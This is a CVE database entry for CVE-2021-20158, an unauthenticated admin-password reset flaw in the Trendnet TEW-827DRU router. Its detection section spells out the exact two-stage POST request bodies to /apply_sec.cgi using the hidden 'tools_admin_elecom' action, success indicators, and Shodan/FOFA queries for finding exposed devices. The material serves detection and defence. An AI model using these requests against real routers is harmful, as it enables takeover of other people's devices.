cbcvebase.
CVE-2021-20158
published 2021-12-30

CVE-2021-20158: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicous actor to force the…

PriorityP274critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
10.77%
95.3th percentile
Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicous actor to force the change of the admin password due to a hidden administrative command.

Affected

1 ranges
VendorProductVersion rangeFixed in
trendnettew-827dru_firmware

Detection & IOCsextracted from sources · hover to see the quote

url/apply_sec.cgi
commandccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}}
commandhtml_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=
otherhttp.html:"TEW-827DRU"
otherhttp.html:"tew-827dru"
  • Detect exploit attempts by monitoring POST requests to /apply_sec.cgi containing the hidden action parameter 'tools_admin_elecom', which is the hidden administrative command used to bypass authentication and change the admin password.
  • A successful exploitation results in a 200 OK HTML response body containing all of: 'setConnectDevice', 'setInternet', 'setWlanSSID', and 'TEW-827DRU' — use these as confirmation indicators after the password-change POST.
  • The attack is two-stage: first POST to /apply_sec.cgi with action=tools_admin_elecom to set a new password unauthenticated, then POST again to /apply_sec.cgi with action=do_graph_auth using the newly set base64-encoded password to confirm login — both requests require no prior session.
  • Identify exposed Trendnet TEW-827DRU devices via Shodan query http.html:"TEW-827DRU" or FOFA query body="tew-827dru" to enumerate attack surface.
  • ·The vulnerability is specific to firmware version 2.08B01 of the Trendnet TEW-827DRU (CPE: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01). Detection rules should be scoped to this firmware version to avoid false positives on patched devices.
  • ·The exploit requires no authentication (PR:N, UI:N per CVSS), meaning any unauthenticated network request to /apply_sec.cgi with action=tools_admin_elecom is inherently suspicious and should be alerted on regardless of source IP.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.